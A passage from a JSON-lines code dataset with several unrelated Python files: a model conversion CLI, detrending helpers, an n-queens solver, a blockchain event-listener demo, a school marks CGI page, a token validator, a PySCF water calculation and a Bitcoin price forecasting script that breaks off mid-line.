ComparatorConfig.from_dict(kwargs)\n dataset_profile_config = DatasetProfileConfig.from_dict(kwargs)\n\n src_model = Model(\n name=src_model_config.model_name,\n path=src_model_config.model_path,\n explicit_format=src_model_config.model_format,\n signature_if_missing=src_model_signature_config,\n )\n\n if not src_model.path.exists():\n LOGGER.error(f\"No such file or directory {src_model.path}\")\n raise click.Abort()\n\n framework = SUFFIX2FRAMEWORK[src_model_config.model_path.suffix]\n framework_docker_image = framework_docker_image or framework.container_image(container_version)\n\n workspace = Workspace(workspace_path)\n\n if launch_mode == ConversionLaunchMode.DOCKER:\n conversion_results = _run_in_docker(\n workspace=workspace,\n override_workspace=override_workspace,\n src_model_config=src_model_config,\n model_signature_config=src_model_signature_config,\n conversion_set_config=conversion_set_config,\n comparator_config=comparator_config,\n dataset_profile_config=dataset_profile_config,\n framework_docker_image=framework_docker_image,\n model_format=src_model.format,\n gpus=gpus,\n verbose=verbose,\n override_conversion_container=override_conversion_container,\n )\n else:\n if verbose:\n log_dict(\n \"convert args:\",\n {\n **dataclasses.asdict(src_model_config),\n **dataclasses.asdict(conversion_set_config),\n **dataclasses.asdict(comparator_config),\n **dataclasses.asdict(src_model_signature_config),\n **dataclasses.asdict(dataset_profile_config),\n \"workspace_path\": workspace_path,\n \"override_workspace\": override_workspace,\n \"output_path\": output_path,\n \"container_version\": container_version,\n \"framework_docker_image\": framework_docker_image,\n \"gpus\": gpus,\n },\n )\n\n conversion_results = _run_locally(\n workspace=workspace,\n override_workspace=override_workspace,\n src_model_config=src_model_config,\n model_signature_config=src_model_signature_config,\n conversion_set_config=conversion_set_config,\n comparator_config=comparator_config,\n dataset_profile_config=dataset_profile_config,\n verbose=verbose,\n )\n\n results_store = ResultsStore(workspace)\n results_store.dump(\"convert_model\", conversion_results)\n\n successful_conversion_results = [result for result in conversion_results if result.status.state == State.SUCCEEDED]\n if not successful_conversion_results:\n raise ModelNavigatorException(\"No successful conversion performed.\")\n elif output_path is not None:\n _copy_to_output_path(conversion_results, 
output_path)\n\n return conversion_results\n\n\n@click.command(name=\"convert\", help=\"Converts models between formats\")\n@common_options\n@options_from_config(ModelConfig, ModelConfigCli)\n@click.option(\"-o\", \"--output-path\", help=\"Path to the output file.\", type=click.Path())\n@click.option(\n \"--launch-mode\",\n type=click.Choice([item.value for item in ConversionLaunchMode]),\n default=ConversionLaunchMode.DOCKER.value,\n help=\"The method by which to launch conversion. \"\n \"'local' assume conversion will be run locally. \"\n \"'docker' build conversion Docker and perform operations inside it.\",\n)\n@click.option(\n \"--override-conversion-container\", is_flag=True, help=\"Override conversion container if it already exists.\"\n)\n@options_from_config(ModelSignatureConfig, ModelSignatureConfigCli)\n@options_from_config(ConversionSetConfig, ConversionSetConfigCli)\n@options_from_config(ComparatorConfig, ComparatorConfigCli)\n@options_from_config(DatasetProfileConfig, DatasetProfileConfigCli)\n@click.pass_context\ndef convert_cmd(\n ctx,\n *,\n verbose: bool,\n launch_mode: str,\n override_conversion_container: bool,\n **kwargs,\n):\n init_logger(verbose=verbose)\n LOGGER.debug(f\"Running '{ctx.command_path}' with config_path: {kwargs.get('config_path')}\")\n\n run_command_validators(\n ctx.command.name,\n configuration={\n \"verbose\": verbose,\n \"launch_mode\": launch_mode,\n \"override_conversion_container\": override_conversion_container,\n **kwargs,\n },\n )\n\n launch_mode = ConversionLaunchMode(launch_mode)\n\n try:\n return convert(\n verbose=verbose,\n launch_mode=launch_mode,\n override_conversion_container=override_conversion_container,\n **kwargs,\n )\n except ModelNavigatorException as e:\n message = str(e)\n raise ModelNavigatorCliException(message)\n","sub_path":"model_navigator/cli/convert_model.py","file_name":"convert_model.py","file_ext":"py","file_size_in_byte":16616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"497217427","text":"# -*- coding: utf-8 -*-\n\"\"\"In some time series there is a trend component that does not interest us, e.g., because we have domain knowledge that this trend is due to another phenomenon like instrument drift. In this case, we might want to remove the trend component for furhter modeling.\nThe same is the case for the variance. 
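ConversionSetConfig.__iter__ in the record above expands a cartesian product of target formats and ONNX opsets, with TensorRT additionally fanning out over precisions. A toy sketch of that expansion — plain strings stand in for the real Format and TensorRTPrecision enums:

import itertools

target_formats = ["tf-savedmodel", "onnx", "torchscript", "tensorrt"]
onnx_opsets = [13]
trt_precisions = ["FP16", "TF32"]

for fmt, opset in itertools.product(target_formats, onnx_opsets):
    if fmt == "tensorrt":
        # TensorRT configs additionally fan out over precisions
        for precision in trt_precisions:
            print(fmt, opset, precision)
    else:
        print(fmt, opset, None)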
If the variance increases over time, one might want to remove this effect using a Box-Cox transformation [1].\n\nReferences:\n[1] https://otexts.com/fpp2/transformations.html#mathematical-transformations\n\"\"\"\n\nfrom copy import deepcopy\nfrom typing import Union\n\nimport pandas as pd\nimport statsmodels\n\n__all__ = [\"detrend_stochastic\", \"detrend_linear_deterministc\"]\n\n\ndef detrend_stochastic(data: Union[pd.Series, pd.DataFrame]) -> Union[pd.Series, pd.DataFrame]:\n    \"\"\"Detrends time series data using the difference method y_t - y_{t-1}.\n    This is useful to remove stochastic trends (random walk with trend).\n\n    Args:\n        data (Union[pd.Series, pd.DataFrame]): Time series data to detrend\n\n    Returns:\n        Union[pd.Series, pd.DataFrame]: Differenced data\n    \"\"\"\n    new_data = data.diff()\n    new_data = new_data.iloc[1:]\n    return new_data\n\n\ndef _detrend_series(series):\n    clean_data = statsmodels.tsa.tsatools.detrend(series.values, order=1, axis=0)\n    return pd.Series(clean_data, index=series.index, name=series.name)\n\n\ndef detrend_linear_deterministc(\n    data: Union[pd.Series, pd.DataFrame]\n) -> Union[pd.Series, pd.DataFrame]:\n    \"\"\"Removes a deterministic linear trend from a series.\n    Note that we assume that the data is sampled on a regular grid and\n    we estimate the trend as\n\n    np.arange(\n        len(series) * (series.iloc[end] - series.iloc[start]) / (end - start)\n    )\n\n    Args:\n        data (Union[pd.Series, pd.DataFrame]): Data to detrend. In case of\n            dataframes we detrend every column separately.\n\n    Returns:\n        Union[pd.Series, pd.DataFrame]: Detrended data\n    \"\"\"\n    data_ = deepcopy(data)\n\n    if isinstance(data_, pd.DataFrame):\n        for column in data_:\n            data_[column] = _detrend_series(data_[column])\n        return data_\n    else:\n        return _detrend_series(data)\n","sub_path":"src/aeml/preprocessing/detrend.py","file_name":"detrend.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"388931489","text":"# The n-queens puzzle asks how to place n queens on an n×n chessboard so that no two queens attack each other.\n#\n# Given an integer n, return all distinct solutions to the n-queens puzzle.\n#\n# Each solution is an explicit board layout in which 'Q' and '.' mark a queen and an empty square respectively.\nimport copy\nclass Solution:\n\tdef solveNQueens(self, n):\n\t\t\"\"\"\n\t\t:type n: int\n\t\t:rtype: List[List[str]]\n\t\t\"\"\"\n\t\tself.out = []\n\t\tself.n = n\n\t\t# initialize the board\n\t\tcheck = [['.'
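detrend_stochastic above is just pandas differencing; a minimal sketch of its effect on a synthetic series with a constant linear trend (pandas only, made-up values):

import pandas as pd

s = pd.Series([10.0, 11.5, 13.0, 14.5], name="y")   # constant slope of 1.5
diffed = s.diff().iloc[1:]                          # y_t - y_{t-1}, NaN head dropped
print(diffed.tolist())                              # [1.5, 1.5, 1.5]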
for _ in range(n)] for _ in range(n)]\n\t\t# recurse over every starting column\n\t\tfor k in range(1,n+1):\n\t\t\tself.recurs_setQueen(copy.deepcopy(check),n,1,k)\n\t\treturn self.out\n\tdef setQueen(self,check,rows,i):\n\t\t# place a queen at row rows, column i\n\t\tcheck[rows-1][i-1] = 'Q'\n\tdef isLegal(self,check,rows,i):\n\t\t# check whether the same column already holds a queen\n\t\tr = rows-2\n\t\tc = i-1\n\t\twhile not (r == -1):\n\t\t\tif check[r][c] == 'Q':\n\t\t\t\treturn False\n\t\t\tr -= 1\n\t\t# check both diagonals\n\t\tr = rows-2\n\t\tc = i-2\n\t\twhile not ((r==-1) | (c == -1)):\n\t\t\tif check[r][c] == 'Q':\n\t\t\t\treturn False\n\t\t\tr -= 1\n\t\t\tc -= 1\n\t\tr = rows-2\n\t\tc = i\n\t\twhile not ((r==-1) | (c == self.n)):\n\t\t\tif check[r][c] == 'Q':\n\t\t\t\treturn False\n\t\t\tr -= 1\n\t\t\tc += 1\n\t\treturn True\n\tdef display(self,check):\n\t\tlist = []\n\t\tfor i in check:\n\t\t\tlist.append(''.join(i))\n\t\tself.out.append(list)\n\tdef recurs_setQueen(self,check,n,rows,cols):\n\t\tself.setQueen(check,rows, cols)\n\t\tif self.isLegal(check,rows, cols) == False:\n\t\t\treturn\n\n\t\tif rows == n:\n\t\t\tself.display(check)\n\t\t\treturn\n\t\tfor i in range(1,n+1):\n\t\t\tself.recurs_setQueen(copy.deepcopy(check),n,rows+1,i)","sub_path":"递归/回溯/solveNQueens.py","file_name":"solveNQueens.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"557623320","text":"import sys\nfrom client.bcosclient import BcosClient\nfrom client.datatype_parser import DatatypeParser\nfrom client.contractnote import ContractNote\nimport json\nimport time\nfrom client.channel_push_dispatcher import ChannelPushHandler\nfrom client.event_callback import BcosEventCallback\nfrom client.event_callback import EventCallbackHandler\nfrom client_config import client_config\ndemo_config = client_config\n\ndef usage():\n    usagetext = '\\nUsage:\\nparams: contractname address event_name indexed\\n' \\\n                '\\t1. contractname :\\tcontract file name, without the .sol suffix; looked up under the contracts directory of the current working directory by default\\n' \\\n                '\\t2. address :\\thex contract address, or last / latest, meaning the record in bin/contract.ini is used\\n' \\\n                '\\t3. event_name :\\toptional; if unset, listen to all events\\n' \\\n                '\\t4. 
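A hypothetical sanity check for the Solution class above, relying on the well-known fact that the 4-queens puzzle has exactly two solutions (assumes the snippet is pasted into, or importable from, the same session):

solver = Solution()
boards = solver.solveNQueens(4)
print(len(boards))        # expected: 2
for row in boards[0]:
    print(row)            # one valid 4x4 layout, e.g. '.Q..' / '...Q' / 'Q...' / '..Q.'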
indexed :\toptional; filter on the indexed fields declared in the event definition\\n\\n'\n    usagetext = usagetext + \"\\teg: for contract sample [contracts/HelloEvent.sol], use cmdline:\\n\\n\"\n\n    usagetext = usagetext + \"\\tpython demo_event_callback.py HelloEvent last \\n\"\n    usagetext = usagetext + \"\\t--listen all event at all indexed : \\n\\n\"\n\n    usagetext = usagetext + \"\\tpython demo_event_callback.py HelloEvent last on_set \\n\"\n    usagetext = usagetext + \"\\t--listen event on_set(string newname) (no indexed): \\n\\n\"\n\n    usagetext = usagetext + \\\n        \"\\tpython demo_event_callback.py HelloEvent last on_number 5\\n\"\n    usagetext = usagetext + \\\n        \"\\t--listen event on_number(string name,int indexed age), age ONLY 5 : \\n\"\n    usagetext = usagetext + \"\\n...(and other events)\"\n    print(usagetext)\n\n\nclass EventCallbackImpl01(EventCallbackHandler):\n    \"\"\"Sample event push handler at the application level.\n    Users can subclass \"ChannelPushHandler\" and implement the on_push interface\n    to handle messages from the nodes; messages arrive as ChannelPack (see client/channelpack.py).\n    The EVENT_LOG_PUSH type is 0x1002; the message in pack.data is decoded as utf-8.\n    For the EVENT_LOG format see https://fisco-bcos-documentation.readthedocs.io/zh_CN/latest/docs/sdk/java_sdk.html#id19\n    \"\"\"\n    abiparser: DatatypeParser = None\n\n    def on_event(self, eventdata):\n        loglist = self.abiparser.parse_event_logs(eventdata[\"logs\"])\n        print(\"- FilterID >>> \", eventdata[\"filterID\"])\n        print(\n            \"--------------------EventCallbackImpl01--------------------\\n\",\n            json.dumps(loglist, indent=4))\n\n\nclass EventCallbackImpl02(ChannelPushHandler):\n    abiparser: DatatypeParser = None\n\n    def on_event(self, eventdata):\n        loglist = self.abiparser.parse_event_logs(eventdata[\"logs\"])\n        print(\">> FilterID \", eventdata[\"filterID\"])\n        print(\">>>>>>>>>>>>>>>>>>EventCallbackImpl02\", json.dumps(loglist, indent=4))\n\n\ndef main(argv):\n    if len(argv) < 2:\n        usage()\n        exit(0)\n\n    contractname = argv[0]\n    address = argv[1]\n    event_name = None\n    indexed_value = None\n    if len(argv) > 2:\n        event_name = argv[2]\n        indexed_value = argv[3:]\n    try:\n        bcos_event = BcosEventCallback()\n        if demo_config.client_protocol is not demo_config.PROTOCOL_CHANNEL:\n            print(\"** using event callback, client protocol MUST be demo_config.PROTOCOL_CHANNEL!!\")\n            print(\"** please check the configure file\")\n            sys.exit(-1)\n\n        bcos_event.setclient(BcosClient())\n        print(bcos_event.client.getinfo())\n\n        print(\"usage input {},{},{},{}\".format(contractname, address, event_name, indexed_value))\n        print(address)\n        if address == \"last\" or address == \"latest\":\n            cn = ContractNote()\n            address = cn.get_last(bcos_event.client.get_full_name(),contractname)\n            print(\"hex address :\", address)\n        abifile = \"contracts/\" + contractname + \".abi\"\n        abiparser = DatatypeParser(abifile)\n        eventcallback01 = EventCallbackImpl01()\n        eventcallback02 = EventCallbackImpl02()\n        eventcallback01.abiparser = abiparser\n        eventcallback02.abiparser = abiparser\n\n        result = bcos_event.register_eventlog_filter(\n            eventcallback01, abiparser, [address], event_name, indexed_value)\n        #result = bcos_event.register_eventlog_filter(eventcallback02,abiparser, [address], \"on_number\")\n\n        print(\n            \"after register ,event_name:{},result:{},all:{}\".format(\n                event_name,\n                result['result'], result))\n\n        while True:\n            print(\"waiting event...\")\n            time.sleep(10)\n    except Exception as e:\n        print(\"Exception!\")\n        import traceback\n        traceback.print_exc()\n    finally:\n        print(\"event callback finished!\")\n        if
bcos_event.client is not None:\n bcos_event.client.finish()\n sys.exit(-1)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"2022-shenzhen-FinTechathon/main_chain()/python sdk/demo_event_callback.py","file_name":"demo_event_callback.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"488765060","text":"#!/usr/bin/python\nprint('Content-type: text/html\\n')\n\n'''\n\nSynergetic Lite\n\nTEACHER SIDE\n\neditMarks.py\n\nTeacher can edit existing marks for each student in a class for an assessment\n\nBy Nick Patrikeos on 04JAN18\n\n'''\n\nimport cgi\nimport cgitb; cgitb.enable()\nimport sqlite3\nfrom dbFunctions import *\n\nform = cgi.FieldStorage()\nclassID = form.getvalue('classID')\nassessmentID = form.getvalue('assessmentID')\n\nvalues = {'classID':classID, 'assessmentID': assessmentID}\n\ndb = sqlite3.connect('synergetic.db')\ncursor = db.cursor()\ncursor.execute('PRAGMA foreign_keys = ON')\n\nstartHTML('Synergetic Lite', 'main')\n\nprint('
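The editMarks.py snippet that begins above leans on sqlite3 named-parameter binding (:classID, :assessmentID). A self-contained sketch of that style against an in-memory database — the table layout and values here are invented for illustration:

import sqlite3

db = sqlite3.connect(":memory:")
cur = db.cursor()
cur.execute("CREATE TABLE Marks (Student TEXT, Assessment INTEGER, Raw_Mark REAL)")
cur.execute("INSERT INTO Marks VALUES ('s001', 7, 18.5)")
cur.execute(
    "SELECT Raw_Mark FROM Marks WHERE Student = :studentID AND Assessment = :assessmentID",
    {"studentID": "s001", "assessmentID": 7},
)
print(cur.fetchall()[0][0])  # 18.5
db.close()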
Edit Marks for Assessment')\nprint('
')\n\ncursor.execute('SELECT Student FROM Enrolments WHERE Class = :classID', values)\nstudents = cursor.fetchall()\n\ncursor.execute('SELECT Out_Of FROM Assessments WHERE Assessment_ID = :assessmentID', values)\noutOf = cursor.fetchall()[0][0]\n\nfieldnames = ['Student', 'Mark']\nprint('
')\n\nfor i in range(len(students)):\n    cursor.execute('SELECT Raw_Mark FROM Marks WHERE Student = :studentID AND Assessment = :assessmentID',\n                   {'studentID':students[i][0], 'assessmentID':assessmentID})\n    mark = cursor.fetchall()[0][0]\n    students[i] += (str(mark) + '/' + str(outOf),)\n\nprint_Records(students, fields=fieldnames)\nprint('')\nprint('')\nprint('')\nprint('
')\nprint('')\n\nprint('
')\n\nendHTML()\n","sub_path":"Synergetic Lite/editMarks.py","file_name":"editMarks.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"627673200","text":"\"\"\"Collection of utility functions\n\"\"\"\nimport logging\nimport yaml\n\nlog = logging.getLogger(__name__) # pylint: disable=C0103\n\n\ndef get_access_token_yaml(token_yaml):\n \"\"\"Utility function to read in access token yaml\n\n Parameters\n ----------\n token_yaml: str\n Path of the token yaml file\n\n Returns\n -------\n dict\n Dicitonary with the access token parameters\n \"\"\"\n try:\n with open(token_yaml) as yaml_file:\n log.debug(\"Loading access token from yaml...\")\n token_yaml = yaml.load(yaml_file, Loader=yaml.FullLoader)\n except Exception:\n log.error(\"Error loading access token from yaml...\")\n raise\n\n validate_access_token(**token_yaml)\n return token_yaml\n\n\ndef validate_access_token(\n access_token=None,\n api_server=None,\n expires_in=None,\n refresh_token=None,\n token_type=None,\n):\n \"\"\"Validate access token\n\n This function validates the access token and ensures that all requiered\n attributes are provided.\n\n Parameters\n ----------\n access_token: str, optional\n Access token\n api_server: str, optional\n Api server URL\n expires_in: int, optional\n Time until token expires\n refresh_token: str, optional\n Refresh token\n token_type: str, optional\n Token type\n\n Raises\n ------\n Exception\n If any of the inputs is None.\n \"\"\"\n log.debug(\"Validating access token...\")\n if access_token is None:\n raise Exception(\"Access token was not provided.\")\n if api_server is None:\n raise Exception(\"API server URL was not provided.\")\n if expires_in is None:\n raise Exception(\"Expiry time was not provided.\")\n if refresh_token is None:\n raise Exception(\"Refresh token was not provided.\")\n if token_type is None:\n raise Exception(\"Token type was not provided.\")\n","sub_path":"qtrade/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"250113035","text":"#!/usr/bin/env python\n\nfrom pyscf import gto\nfrom pyscf import scf, dft, df\n\nmol = gto.Mole()\nmol.verbose = 5\nmol.atom =''' \n H 0.00000000 0.75720000 -0.46920000\n H 0.00000000 -0.75720000 -0.46920000\n O 0.00000000 0.00000000 0.11730000\n '''\nmol.unit='A'\nmol.basis = 'cc-pvtz'\n#mol.pseudo = 'bfd-vtz'\nmol.spin=0 #Value of S where the spin multiplicity is 2S+1\nmol.build()\n\n\n\n#Hartree Fock\n#mf = scf.ROHF(mol)\n\n#DFT\nmf = dft.ROKS(mol)\nmf.xc ='b3lyp' \n\ne_scf=mf.kernel()\n\n#Section for QMCPACK\ntitle=\"H2O_AE_DFT\"\nfrom PyscfToQmcpack import savetoqmcpack\nsavetoqmcpack(mol,mf,title=title)\n\n","sub_path":"day1_pyscf_molecules/H2O/DFT_AE/ref_files/h2o_ae_dft.py","file_name":"h2o_ae_dft.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"586245403","text":"\n#%%\n#This code is retrieved from https://activewizards.com/blog/bitcoin-price-forecasting-with-deep-learning-algorithms/\n\n\n#%%\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nfrom scipy import stats\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nfrom random import randint\nfrom keras.models import Sequential\nfrom keras.layers import 
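A hypothetical call into the qtrade validate_access_token helper above; the token values are placeholders, not real credentials:

token = {
    "access_token": "abc123",
    "api_server": "https://api.example.com/",
    "expires_in": 1800,
    "refresh_token": "def456",
    "token_type": "Bearer",
}
validate_access_token(**token)  # passes silently

try:
    validate_access_token(access_token="abc123")
except Exception as err:
    print(err)  # API server URL was not provided.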
Dense\nfrom keras.layers import LSTM\nfrom keras.layers import GRU\nfrom keras.callbacks import EarlyStopping\nfrom keras import initializers\nfrom matplotlib import pyplot\nfrom datetime import datetime\nfrom matplotlib import pyplot as plt\nimport plotly.offline as py\nimport plotly.graph_objs as go\npy.init_notebook_mode(connected=True)\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n#%%\ndata = pd.read_csv('./coinbaseUSD_1-min_data_2014-12-01_to_2018-11-11.csv')\ndata.isnull().values.any()\ndata.head(10)\n\n\n#%%\ndata['date'] = pd.to_datetime(data['Timestamp'],unit='s').dt.date\ngroup = data.groupby('date')\nDaily_Price = group['Weighted_Price'].mean()\n\n\n#%%\nDaily_Price.head()\n\n\n#%%\nDaily_Price.tail()\n\n\n#%%\nimport datetime\nd0 = datetime.date(2016, 1, 1)\nd1 = datetime.date(2017, 10, 15)\ndelta = d1 - d0\ndays_look = delta.days + 1\nprint(days_look)\n\nd0 = datetime.date(2017, 8, 21)\nd1 = datetime.date(2017, 10, 20)\ndelta = d1 - d0\ndays_from_train = delta.days + 1\nprint(days_from_train)\n\nd0 = datetime.date(2017, 10, 15)\nd1 = datetime.date(2017, 10, 20)\ndelta = d1 - d0\ndays_from_end = delta.days + 1\nprint(days_from_end)\n\n\n#%%\ndf_train= Daily_Price[len(Daily_Price)-days_look-days_from_end:len(Daily_Price)-days_from_train]\ndf_test= Daily_Price[len(Daily_Price)-days_from_train:]\n\nprint(len(df_train), len(df_test))\n\n\n#%%\nworking_data = [df_train, df_test]\nworking_data = pd.concat(working_data)\n\nworking_data = working_data.reset_index()\nworking_data['date'] = pd.to_datetime(working_data['date'])\nworking_data = working_data.set_index('date')\n\n\n#%%\ns = sm.tsa.seasonal_decompose(working_data.Weighted_Price.values, freq=60)\ntrace1 = go.Scatter(x = np.arange(0, len(s.trend), 1),y = s.trend,mode = 'lines',name = 'Trend',\n line = dict(color = ('rgb(244, 146, 65)'), width = 4))\ntrace2 = go.Scatter(x = np.arange(0, len(s.seasonal), 1),y = s.seasonal,mode = 'lines',name = 'Seasonal',\n line = dict(color = ('rgb(66, 244, 155)'), width = 2))\n\ntrace3 = go.Scatter(x = np.arange(0, len(s.resid), 1),y = s.resid,mode = 'lines',name = 'Residual',\n line = dict(color = ('rgb(209, 244, 66)'), width = 2))\n\ntrace4 = go.Scatter(x = np.arange(0, len(s.observed), 1),y = s.observed,mode = 'lines',name = 'Observed',\n line = dict(color = ('rgb(66, 134, 244)'), width = 2))\n\ndata = [trace1, trace2, trace3, trace4]\nlayout = dict(title = 'Seasonal decomposition', xaxis = dict(title = 'Time'), yaxis = dict(title = 'Price, USD'))\nfig = dict(data=data, layout=layout)\npy.iplot(fig, filename='seasonal_decomposition')\n\n\n#%%\nplt.figure(figsize=(15,7))\nax = plt.subplot(211)\nsm.graphics.tsa.plot_acf(working_data.Weighted_Price.values.squeeze(), lags=48, ax=ax)\nax = plt.subplot(212)\nsm.graphics.tsa.plot_pacf(working_data.Weighted_Price.values.squeeze(), lags=48, ax=ax)\nplt.tight_layout()\nplt.show()\n\n\n#%%\ndf_train = working_data[:-60]\ndf_test = working_data[-60:]\n\n\n#%%\ndef create_lookback(dataset, look_back=1):\n X, Y = [], []\n for i in range(len(dataset) - look_back):\n a = dataset[i:(i + look_back), 0]\n X.append(a)\n Y.append(dataset[i + look_back, 0])\n return np.array(X), np.array(Y)\n\n\n#%%\n\n\n\n#%%\nfrom sklearn.preprocessing import MinMaxScaler\n\ntraining_set = df_train.values\ntraining_set = np.reshape(training_set, (len(training_set), 1))\ntest_set = df_test.values\ntest_set = np.reshape(test_set, (len(test_set), 1))\n\n#scale datasets\nscaler = MinMaxScaler()\ntraining_set = scaler.fit_transform(training_set)\ntest_set = 
scaler.transform(test_set)\n\n# create datasets which are suitable for time series forecasting\nlook_back = 30\nX_train, Y_train = create_lookback(training_set, look_back)\nX_test, Y_test = create_lookback(test_set, look_back)\n\n # reshape datasets so that they will be ok for the requirements of the LSTM model in Keras\nX_train = np.reshape(X_train, (len(X_train), 1, X_train.shape[1]))\nX_test = np.reshape(X_test, (len(X_test), 1, X_test.shape[1]))\n\n\n#%%\n# initialize sequential model, add 2 stacked LSTM layers and densely connected output neuron\nmodel = Sequential()\nmodel.add(LSTM(256, return_sequences=True, input_shape=(X_train.shape[1], X_train.shape[2])))\nmodel.add(LSTM(256))\nmodel.add(Dense(1))\n\n# compile and fit the model\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nhistory = model.fit(X_train, Y_train, epochs=100, batch_size=16, shuffle=False,\n validation_data=(X_test, Y_test),\n callbacks = [EarlyStopping(monitor='val_loss', min_delta=5e-5, patience=20, verbose=1)])\n\n\n#%%\ntrace1 = go.Scatter(\n x = np.arange(0, len(history.history['loss']), 1),\n y = history.history['loss'],\n mode = 'lines',\n name = 'Train loss',\n line = dict(color=('rgb(66, 244, 155)'), width=2, dash='dash')\n)\ntrace2 = go.Scatter(\n x = np.arange(0, len(history.history['val_loss']), 1),\n y = history.history['val_loss'],\n mode = 'lines',\n name = 'Test loss',\n line = dict(color=('rgb(244, 146, 65)'), width=2)\n)\n\ndata = [trace1, trace2]\nlayout = dict(title = 'Train and Test Loss during training',\n xaxis = dict(title = 'Epoch number'), yaxis = dict(title = 'Loss'))\nfig = dict(data=data, layout=layout)\npy.iplot(fig, filename='training_process')\n\n\n#%%\n# add one additional data point to align shapes of the predictions and true labels\n#X_test = np.append(X_test, scaler.transform(working_data.iloc[-1][0]))\nX_test = np.append(X_test, working_data.iloc[-1][0])\nX_test = np.reshape(X_test, (len(X_test), 1, 1))\n\n# get predictions and then make some transformations to be able to calculate RMSE properly in USD\nprediction = model.predict(X_test)\nprediction_inverse = scaler.inverse_transform(prediction.reshape(-1, 1))\nY_test_inverse = scaler.inverse_transform(Y_test.reshape(-1, 1))\nprediction2_inverse = np.array(prediction_inverse[:,0][1:])\nY_test2_inverse = np.array(Y_test_inverse[:,0])\n\n\n#%%\ntrace1 = go.Scatter(\n x = np.arange(0, len(prediction2_inverse), 1),\n y = prediction2_inverse,\n mode = 'lines',\n name = 'Predicted labels',\n line = dict(color=('rgb(244, 146, 65)'), width=2)\n)\ntrace2 = go.Scatter(\n x = np.arange(0, len(Y_test2_inverse), 1),\n y = Y_test2_inverse,\n mode = 'lines',\n name = 'True labels',\n line = dict(color=('rgb(66, 244, 155)'), width=2)\n)\n\ndata = [trace1, trace2]\nlayout = dict(title = 'Comparison of true prices (on the test dataset) with prices our model predicted',\n xaxis = dict(title = 'Day number'), yaxis = dict(title = 'Price, USD'))\nfig = dict(data=data, layout=layout)\npy.iplot(fig, filename='results_demonstrating0')\n\n\n#%%\nRMSE = sqrt(mean_squared_error(Y_test2_inverse, prediction2_inverse))\nprint('Test RMSE: %.3f' % RMSE)\n\n\n#%%\nTest_Dates = Daily_Price[len(Daily_Price)-days_from_train:].index\n\ntrace1 = go.Scatter(x=Test_Dates, y=Y_test2_inverse, name= 'Actual Price',\n line = dict(color = ('rgb(66, 244, 155)'),width = 2))\ntrace2 = go.Scatter(x=Test_Dates, y=prediction2_inverse, name= 'Predicted Price',\n line = dict(color = ('rgb(244, 146, 65)'),width = 2))\ndata = [trace1, trace2]\nlayout = dict(title = 
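A tiny numpy check of the create_lookback windowing defined earlier in this snippet — each X row holds look_back consecutive values and Y is the value that follows:

import numpy as np

series = np.arange(6, dtype=float).reshape(-1, 1)  # [[0.], [1.], ..., [5.]]
X, Y = create_lookback(series, look_back=3)
print(X)  # [[0. 1. 2.] [1. 2. 3.] [2. 3. 4.]]
print(Y)  # [3. 4. 5.]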
'Comparison of true prices (on the test dataset) with prices our model predicted, by dates',\n xaxis = dict(title = 'Date'), yaxis = dict(title = 'Price, USD'))\nfig = dict(data=data, layout=layout)\npy.iplot(fig, filename='results_demonstrating1')\n\n\n#%%\n# This function prepares random train/test split, \n# scales data with MinMaxScaler, create time series labels (Y)\ndef get_split(working_data, n_train, n_test, look_back = 1):\n # get a point from which we start to take train dataset and after it - test dataset\n start_point = randint(0, (len(working_data)-n_test-n_train))\n df_train = working_data[start_point:start_point+n_train]\n df_test = working_data[start_point+n_train:start_point+n_train+n_test]\n\n training_set = df_train.values\n training_set = np.reshape(training_set, (len(training_set), 1))\n test_set = df_test.values\n test_set = np.reshape(test_set, (len(test_set), 1))\n\n # scale datasets\n scaler_cv = MinMaxScaler()\n training_set = scaler_cv.fit_transform(training_set)\n test_set = scaler_cv.transform(test_set)\n\n # create datasets which are suitable for time series forecasting\n X_train, Y_train = create_lookback(training_set, look_back)\n X_test, Y_test = create_lookback(test_set, look_back)\n\n # reshape datasets so that they will be ok for the requirements of the models in Keras\n X_train = np.reshape(X_train, (len(X_train), 1, X_train.shape[1]))\n X_test = np.reshape(X_test, (len(X_test), 1, X_test.shape[1]))\n\n return X_train, Y_train, X_test, Y_test, scaler_cv, start_point\n\n# This function takes datasets from the previous function as input and train model using these datasets\ndef train_model(X_train, Y_train, X_test, Y_test):\n # initialize sequential model, add bidirectional LSTM layer and densely connected output neuron\n model = Sequential()\n model.add(GRU(256, input_shape=(X_train.shape[1], X_train.shape[2])))\n model.add(Dense(1))\n\n # compile and fit the model\n model.compile(loss='mean_squared_error', optimizer='adam')\n model.fit(X_train, Y_train, epochs = 100, batch_size = 16, shuffle = False,\n validation_data=(X_test, Y_test), verbose=0,\n callbacks = [EarlyStopping(monitor='val_loss',min_delta=5e-5,patience=20,verbose=0)])\n return model\n\n# This function uses trained model and test dataset to calculate RMSE\ndef get_rmse(model, X_test, Y_test, scaler, start_point, working_data, n_train):\n # add one additional data point to align shapes of the predictions and true labels\n X_test = np.append(X_test, scaler.transform(working_data.iloc[start_point+n_train+len(X_test)][0]))\n X_test = np.reshape(X_test, (len(X_test), 1, 1))\n\n # get predictions and then make some transformations to be able to calculate RMSE properly in USD\n prediction = model.predict(X_test)\n prediction_inverse = scaler.inverse_transform(prediction.reshape(-1, 1))\n Y_test_inverse = 